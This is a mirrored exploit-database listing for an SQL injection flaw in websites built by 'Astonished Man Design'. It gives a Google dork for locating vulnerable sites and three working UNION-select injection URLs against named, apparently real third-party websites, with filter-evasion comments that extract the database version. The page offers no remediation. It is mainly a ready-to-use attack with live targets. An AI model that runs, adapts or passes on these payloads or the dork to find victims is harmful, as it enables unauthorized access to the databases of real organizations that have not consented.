Advertisement






Astonished Man Design - Sql Injection Vulnerability

CVE Category Price Severity
Not specified CWE-89 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2023-09-15
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023090052

Below is a copy:

Astonished Man Design - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Astonished Man Design - Sql Injection Vulnerability
#Date: 2023-09-15
#Exploit Author: Behrouz Mansoori
#Google Dork: "website by Astonished Man Design"
#Category:webapps
#Tested On: Mac, Firefox
Proof of Concept:
### Demo :

https://adamsangelsministry.org/news.php?id=-141%27%20%23dwjwhfuh%0Aunion%20%23djcbhdghs%0Aselect%201,2,3,version(),5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=%27news_data%27--+

https://jansrealty.net/contact.php?id=-19%27%20/*!12345union*/%20select%20version(),2,3--+

https://www.collectableweapons.com/listings.php?id=-285%27%20/*!12345union*/%20select%201,2,3,version(),5,6,7,8,9,10,11--+

*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.